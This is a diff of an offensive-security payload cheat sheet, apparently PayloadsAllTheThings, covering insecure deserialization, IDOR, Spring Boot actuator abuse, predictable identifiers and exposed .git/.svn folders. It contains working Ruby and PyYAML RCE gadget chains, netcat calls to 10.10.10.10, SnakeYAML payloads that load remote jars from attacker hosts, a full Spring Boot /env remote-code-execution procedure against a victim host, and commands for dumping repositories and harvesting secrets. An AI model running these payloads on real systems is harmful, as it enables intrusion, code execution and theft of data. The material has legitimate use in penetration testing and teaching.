 * [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization)
 * [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab)
 ## References
-* [Github - ysoserial](https://github.com/frohoff/ysoserial)
+* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial)
 * [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
@@ -23,5 +48,9 @@ Check the following sub-sections, located in other files :
 * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
 * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 
-* [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
+* [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
-* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
+* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
 * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
 * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
 * [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
 * [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting)
--- a/Deserialization/Ruby.md
+++ b/Deserialization/Ruby.md
@@ -16,7 +16,7 @@ require "yaml"
 YAML.load(File.read("p.yml"))
 ```
-Exploitation code
+Universal gadget for ruby <= 2.7.2:
 ```ruby
 --- !ruby/object:Gem::Requirement
 requirements:
@@ -29,9 +29,35 @@ requirements:
      spec:
 ```
 Universal gadget for ruby 2.x - 3.x.
 ```ruby
 ---
 - !ruby/object:Gem::Installer
    i: x
 - !ruby/object:Gem::SpecFetcher
    i: y
 - !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve
 ```
 ## References
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
+- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
 - [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
 * [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
--- a/Deserialization/YAML.md
+++ b/Deserialization/YAML.md
@@ -0,0 +1,99 @@
 # YAML Deserialization
 ## Summary
 * [Tools](#tools)
 * [Exploit](#exploit)
    * [PyYAML](#pyyaml)
    * [ruamel.yaml](#ruamelyaml)
    * [Ruby](#ruby)
    * [SnakeYAML](#snakeyaml)
 * [References](#references)
 ## Tools
 * [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
 * [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
 * [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
 ## Exploit
 ### PyYAML
 ```yaml
 !!python/object/apply:time.sleep [10]
 !!python/object/apply:builtins.range [1, 10, 1]
 !!python/object/apply:os.system ["nc 10.10.10.10 4242"]
 !!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
 !!python/object/new:subprocess [["ls","-ail"]]
 !!python/object/new:subprocess.check_output [["ls","-ail"]]
 ```
 ```yaml
 !!python/object/apply:subprocess.Popen
 - ls
 ```
 ```yaml
 !!python/object/new:str
 state: !!python/tuple
 - 'print(getattr(open("flag\x2etxt"), "read")())'
 - !!python/object/new:Warning
  state:
    update: !!python/name:exec
 ```
 Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution.
 [PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)
 The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)```
 ```
 with open('exploit_unsafeloader.yml') as file:
        data = yaml.load(file,Loader=yaml.UnsafeLoader)
 ```
 ## Ruamel.yaml
 ## Ruby
 ```ruby
 ---
 - !ruby/object:Gem::Installer
     i: x
 - !ruby/object:Gem::SpecFetcher
     i: y
 - !ruby/object:Gem::Requirement
   requirements:
     !ruby/object:Gem::Package::TarReader
     io: &1 !ruby/object:Net::BufferedIO
       io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
       debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: sleep 600
          method_id: :resolve 
 ```
 ## SnakeYAML
 ```yaml
 !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker-ip/"]
  ]]
 ]
 ```
 ## References
 * [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
 * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
 * [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
 * [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
 * [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
--- a/References/README.md
+++ b/References/README.md
@@ -1,59 +1,144 @@
 # Insecure Direct Object References
-> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.  - OWASP
+> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP
 ## Summary
 * [Tools](#tools)
 * [Labs](#labs)
 * [Exploit](#exploit)
-* [Examples](#examples)
+    * [Numeric Value Parameter](#numeric-value-parameter)
    * [Common Identifiers Parameter](#common-identifiers-parameter) 
    * [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator) 
    * [Hashed Parameter](#hashed-parameter)
    * [Wildcard Parameter](#wildcard-parameter)
    * [IDOR Tips](#idor-tips)
 * [References](#references)
 ## Tools
- Burp Suite plugin Authz
+- [PortSwigger/BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
- Burp Suite plugin AuthMatrix
+- [PortSwigger/BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e)
- Burp Suite plugin Authorize
+- [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
 ## Labs
 * [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
 ## Exploit
 IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion.
 **Example of IDOR**
 Imagine a web application that allows users to view their profile by clicking a link `https://example.com/profile?user_id=123`:
 ```php
 <?php
    $user_id = $_GET['user_id'];
    $user_info = get_user_info($user_id);
    ...
 ```
 Here, `user_id=123` is a direct reference to a specific user's profile. If the application doesn't properly check that the logged-in user has the right to view the profile associated with `user_id=123`, an attacker could simply change the `user_id` parameter to view other users' profiles:
 ```ps1
 https://example.com/profile?user_id=124
 ```
 ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)
 The value of a parameter is used directly to retrieve a database record.
-```powershell
+### Numeric Value Parameter
 http://foo.bar/somepage?invoice=12345
 ```
-The value of a parameter is used directly to perform an operation in the system
+Increment and decrement these values to access sensitive informations.
-```powershell
+* Decimal value: `287789`, `287790`, `287791`, ...
-http://foo.bar/changepassword?user=someuser
+* Hexadecimal: `0x4642d`, `0x4642e`, `0x4642f`, ...
-```
+* Unix epoch timestamp: `1695574808`, `1695575098`, ...
-The value of a parameter is used directly to retrieve a file system resource
+**Examples** 
 ```powershell
 http://foo.bar/showImage?img=img00011
 ```
 The value of a parameter is used directly to access application functionality
 ```powershell
 http://foo.bar/accessPage?menuitem=12
 ```
 ## Examples
 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
-* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
+* [HackerOne - Delete messages via IDOR - naaash](https://hackerone.com/reports/697412)
 ### Common Identifiers Parameter
 Some identifiers can be guessed like names and emails, they might grant you access to customer data.
 * Name: `john`, `doe`, `john.doe`, ...
 * Email: `john.doe@mail.com`
 * Base64 encoded value: `am9obi5kb2VAbWFpbC5jb20=`
 **Examples** 
 * [HackerOne - Insecure Direct Object Reference (IDOR) - Delete Campaigns - datph4m](https://hackerone.com/reports/1969141)
 ### Weak Pseudo Random Number Generator
 * UUID/GUID v1 can be predicted if you know the time they were created: `95f6e264-bb00-11ec-8833-00155d01ef00`
 * MongoDB Object Ids are generated in a predictable manner: `5ae9b90a2c144b9def01ec37`
    * a 4-byte value representing the seconds since the Unix epoch
    * a 3-byte machine identifier
    * a 2-byte process id
    * a 3-byte counter, starting with a random value
 **Examples** 
 * [HackerOne - IDOR allowing to read another user's token on the Social Media Ads service - a_d_a_m](https://hackerone.com/reports/1464168)
 * [IDOR through MongoDB Object IDs Prediction](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
 ### Hashed Parameter
 Sometimes we see websites using hashed values to generate a random user id or token, like `sha1(username)`, `md5(email)`, ...
 * MD5: `098f6bcd4621d373cade4e832627b4f6`
 * SHA1: `a94a8fe5ccb19ba61c4c0873d391e987982fbbd3`
 * SHA2: `9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08`
 **Examples** 
 * [IDOR with Predictable HMAC Generation - DiceCTF 2022 - CryptoCat](https://youtu.be/Og5_5tEg6M0)
 ### Wildcard Parameter
 Send a wilcard instead of an ID, some backend might respond with the data of all the users.
 * `GET /api/users/* HTTP/1.1`
 * `GET /api/users/% HTTP/1.1`
 * `GET /api/users/_ HTTP/1.1`
 * `GET /api/users/. HTTP/1.1`
 **Examples** 
 * [TODO]()
 ### IDOR Tips
 * Change the HTTP request: `POST → PUT`
 * Change the content type: `XML → JSON`
 * Transform numerical values to arrays: `{"id":19} → {"id":[19]}`
 * Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id`
 ## References
 * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
 * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
-* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
+* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
 * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
 * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
 * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 
-* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
+* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
 * [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres)
 * [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
 * [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor)
 * [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor)
--- a/Interface/README.md
+++ b/Interface/README.md
@@ -1,19 +1,94 @@
-# Insecure management interface
+# Insecure Management Interface
 ## Springboot-Actuator
 Actuator endpoints let you monitor and interact with your application. 
 Spring Boot includes a number of built-in endpoints and lets you add your own. 
-For example, the health endpoint provides basic application health information. 
+For example, the `/health` endpoint provides basic application health information. 
 Some of them contains sensitive info such as :
- `/trace` (by default the last 100 HTTP requests with headers)
+- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
- `/env` (the current environment properties)
+- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
- `/heapdump` (builds and returns a heap dump from the JVM used by our application). 
+- `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
 - `/dump` - Displays a dump of threads (including a stack trace).
 - `/logfile` - Outputs the contents of the log file.
 - `/mappings` - Shows all of the MVC controller mappings.
-These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
+These endpoints are enabled by default in Springboot 1.X.
 Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
 Since Springboot 2.X only `/health` and `/info` are enabled by default.
 ### Remote Code Execution via `/env`
 Spring is able to load external configurations in the YAML format.
 The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
 In other words, an attacker can gain remote code execution by loading a malicious config file.
 #### Steps
 1. Generate a payload of SnakeYAML deserialization gadget.
 - Build malicious jar
 ```bash
 git clone https://github.com/artsploit/yaml-payload.git
 cd yaml-payload
 # Edit the payload before executing the last commands (see below)
 javac src/artsploit/AwesomeScriptEngineFactory.java
 jar -cvf yaml-payload.jar -C src/ .
 ```
 - Edit src/artsploit/AwesomeScriptEngineFactory.java
 ```java
 public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
    } catch (IOException e) {
        e.printStackTrace();
    }
 }
 ```
 - Create a malicious yaml config (yaml-payload.yml)
 ```yaml
 !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker.example/yaml-payload.jar"]
  ]]
 ]
 ```
 2. Host the malicious files on your server.
 - yaml-payload.jar
 - yaml-payload.yml
 3. Change `spring.cloud.bootstrap.location` to your server.
 ```
 POST /env HTTP/1.1
 Host: victim.example:8090
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 59
 spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
 ```
 4. Reload the configuration.
 ```
 POST /refresh HTTP/1.1
 Host: victim.example:8090
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 0
 ```
 ## References
 * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
 * [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
--- a/Randomness/README.md
+++ b/Randomness/README.md
@@ -0,0 +1,64 @@
 # Insecure Randomness
 ## Summary
 * [GUID / UUID](#guid--uuid)
    * [GUID Versions](#guid-versions)
    * [Tools](#tools)
 * [Mongo ObjectId](#mongo-objectid)
    * [Tools](#tools)
 * [References](#references)
 ## GUID / UUID
 ### GUID Versions
 Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` 
 The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.
 | Version  | Notes  |
 |----------|--------|
 | 0 | Only `00000000-0000-0000-0000-000000000000` |
 | 1 | based on time, or clock sequence |
 | 2 | reserved in the RFC 4122, but ommitted in many implementations |
 | 3 | based on a MD5 hash |
 | 4 | randomly generated |
 | 5 | based on a SHA1 hash |
 ### Tools
 * [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs
    ```ps1
    $ guidtool -i 95f6e264-bb00-11ec-8833-00155d01ef00
    UUID version: 1
    UUID time: 2022-04-13 08:06:13.202186
    UUID timestamp: 138691299732021860
    UUID node: 91754721024
    UUID MAC address: 00:15:5d:01:ef:00
    UUID clock sequence: 2099
    $ guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
    ```
 ## Mongo ObjectId
 Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId value consists of: 
 * **Timestamp** (4 bytes): Represents the ObjectId’s creation time, measured in seconds since the Unix epoch (January 1, 1970).
 * **Machine Identifier** (3 bytes): Identifies the machine on which the ObjectId was generated. Typically derived from the machine's hostname or IP address, making it predictable for documents created on the same machine.
 * **Process ID** (2 bytes): Identifies the process that generated the ObjectId. Typically the process ID of the MongoDB server process, making it predictable for documents created by the same process.
 * **Counter** (3 bytes): A unique counter value that is incremented for each new ObjectId generated. Initialized to a random value when the process starts, but subsequent values are predictable as they are generated in sequence.
 ### Tools
 * [andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict) - Predict Mongo ObjectIds
    ```ps1
    ./mongo-objectid-predict 5ae9b90a2c144b9def01ec37
    5ae9bac82c144b9def01ec39
    5ae9bacf2c144b9def01ec3a
    5ae9bada2c144b9def01ec3b
    ```
 ### References
 * [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
 * [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
--- a/Management/Files/github-dorks.txt
+++ b/Management/Files/github-dorks.txt
--- a/Management/README.md
+++ b/Management/README.md
@@ -1,24 +1,36 @@
-# Insecure source code management
+# Insecure Source Code Management
- [GIT - Source code management](#git---source-code-management)
+* [Git](#git)
-  - [Github example with a .git](#github-example-with-a-git)
+  + [Example](#example)
-  - [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
+    - [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
-  - [Automatic way : diggit.py](#automatic-way--diggitpy)
+    - [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
-  - [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
+  + [Tools](#tools)
-  - [Automatic way : rip-git](#automatic-way--rip-git)
+    - [Automatic recovery](#automatic-recovery)
-  - [Automatic way : GitHack](#automatic-way--githack)
+      * [git-dumper.py](#git-dumperpy)
-  - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
+      * [diggit.py](#diggitpy)
-  - [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob)
+      * [GoGitDumper](#gogitdumper)
-  - [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks)
+      * [rip-git](#rip-git)
- [SVN - Source code management](#svn---source-code-management)
+      * [GitHack](#githack)
-  - [SVN example (Wordpress)](#svn-example-wordpress)
+      * [GitTools](#gittools)
-  - [Automatic way : svn-extractor](#automatic-way--svn-extractor)
+    - [Harvesting secrets](#harvesting-secrets)
- [BAZAAR - Source code management](#bazaar---source-code-management)
+      * [trufflehog](#trufflehog)
-  - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
+      * [Yar](#yar)
-  - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
+      * [Gitrob](#gitrob)
- [Leaked API keys](#leaked-api-keys)
+      * [Gitleaks](#gitleaks)
 * [Subversion](#subversion)
  + [Example (Wordpress)](#example-wordpress)
  + [Tools](#tools-1)
    - [svn-extractor](#svn-extractor)
 * [Bazaar](#bazaar)
  + [Tools](#tools-2)
    - [rip-bzr.pl](#rip-bzrpl)
    - [bzr_dumper](#bzr_dumper)
 * [Mercurial](#mercurial)
  + [Tools](#tools-3)
    - [rip-hg.pl](#rip-hgpl)
 * [References](#references)
-## GIT - Source code management
+## Git
 The following examples will create either a copy of the .git or a copy of the current commit.
@@ -28,28 +40,32 @@ Check for the following files, if they exist you can extract the .git folder.
 - .git/HEAD
 - .git/logs/HEAD
-### Github example with a .git
+### Example
-1. Check 403 error (Forbidden) for .git or even better : a directory listing
+#### Recovering file contents from .git/logs/HEAD
-2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
+
 1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
 2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
    ```powershell
    0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
    15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
    26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
    6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
    ```
-3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
+3. Access the commit using the hash
    ```powershell
-    # create a .git directory
+    # create an empty .git repository
    git init test
    cd test/.git
    # download the file
-    wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
+    wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
    # first byte for subdirectory, remaining bytes for filename
    mkdir .git/object/26
    mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
-    # display the content of the file
+    # display the file
    git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
        tree 323240a3983045cdc0dec2e88c1358e7998f2e39
        parent 15ca375e54f056a576905b41a417b413c57df6eb
@@ -59,7 +75,7 @@ Check for the following files, if they exist you can extract the .git folder.
    ```
 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
    ```powershell
-    wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+    wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
    mkdir .git/object/32
    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
@@ -72,22 +88,22 @@ Check for the following files, if they exist you can extract the .git folder.
    ```
 5. Read the data (flag.txt)
    ```powershell
-    wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
+    wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
    mkdir .git/object/cb
    mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
    git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
    ```
-### Recovering the content of .git/index
+#### Recovering file contents from .git/index
-Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
+Use the git index file parser https://pypi.python.org/pypi/gin (python3).
 ```powershell
 pip3 install gin
 gin ~/git-repo/.git/index
 ```
-Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
+Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
 ```powershell
 $ gin .git/index | egrep -e "name|sha1" 
@@ -98,32 +114,44 @@ name = CRLF injection/README.md
 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 ```
 ### Tools
 #### Automatic recovery
-### Automatic way : diggit.py
+##### git-dumper.py
 ```powershell
 git clone https://github.com/arthaud/git-dumper
 pip install -r requirements.txt
 ./git-dumper.py http://web.site/.git ~/website
 ```
 ##### diggit.py
 ```powershell
 git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
-./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
+./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
 -u is remote path, where .git folder exists
 -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
 -o is a hash of particular Git object to download
 ```
-### Automatic way : GoGitDumper
+##### GoGitDumper
 ```powershell
 go get github.com/c-sto/gogitdumper
-gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
+gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
 git log
 git checkout
 ```
-### Automatic way : rip-git
+##### rip-git
 ```powershell
-perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
+git clone https://github.com/kost/dvcs-ripper
 perl rip-git.pl -v -u "http://web.site/.git/"
 git cat-file -p 07603070376d63d911f608120eb4b5489b507692  
 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
@@ -134,23 +162,42 @@ committer Michael <michael@easyctf.com> 1489389105 +0000
 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 ```
-### Automatic way : GitHack
+##### GitHack
 ```powershell
 git clone https://github.com/lijiejie/GitHack
-GitHack.py http://www.openssl.org/.git/
+GitHack.py http://web.site/.git/
 ```
-### Harvesting secrets : trufflehog
+##### GitTools
-> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
+```powershell
 git clone https://github.com/internetwache/GitTools
 ./gitdumper.sh http://target.tld/.git/ /tmp/destdir
 git checkout -- .
 ```
 #### Harvesting secrets
 ##### trufflehog
 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
 ```powershell
 pip install truffleHog # https://github.com/dxa4481/truffleHog
 truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
 ```
-### Harvesting secrets : Gitrob
+##### Yar
 > Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
 ```powershell
 go get github.com/nielsing/yar # https://github.com/nielsing/yar
 yar -o orgname --both
 ```
 ##### Gitrob
 > Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
@@ -160,13 +207,13 @@ export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
 gitrob [options] target [target2] ... [targetN]
 ```
-### Harvesting secrets - Gitleaks
+##### Gitleaks
 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
 ```powershell
 # Run gitleaks against a public repository
-docker run --rm --name=gitleaks zricethezav/gitleaks -v -r  https://github.com/zricethezav/gitleaks.git
+docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
 # Run gitleaks against a local repository already cloned into /tmp/
 docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
@@ -179,9 +226,9 @@ or
 go get -u github.com/zricethezav/gitleaks
 ```
-## SVN - Source code management
+## Subversion
-### SVN example (Wordpress)
+### Example (Wordpress)
 ```powershell
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
